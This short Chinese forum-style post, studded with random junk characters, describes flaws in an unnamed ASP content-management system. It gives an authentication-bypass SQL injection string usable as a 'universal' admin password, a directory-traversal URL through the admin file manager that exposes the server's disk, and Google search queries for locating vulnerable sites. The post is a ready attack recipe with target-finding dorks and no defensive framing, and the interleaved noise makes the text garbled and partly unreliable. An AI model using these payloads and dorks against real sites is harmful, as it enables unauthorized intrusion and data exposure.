后台万能密码 'or'='or'6 ^/ h0 N# Z4 D1 ]7 N
2 c8 f; i; d& P, H8 u+ o后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
# a1 s! j" G) A, s; y$ Q2 cadmin/uploadfile.asp?currentFolder=/upfiles/../
& u% H Q4 C2 o0 A1 a; q6 o5 E
d- k' H$ v& Y# A" E0 S! D( q漏洞证明:
1 W ^. S1 y* N6 {
. K$ n1 [& L+ r! r9 }, ]谷歌:inurl:type.asp?id=1 新闻中心
& _, q( x2 b, G, u* V7 \或者 :inurl:download_ok.asp?5 T. d1 z- P- C% l
; u7 D1 r% m, {! u |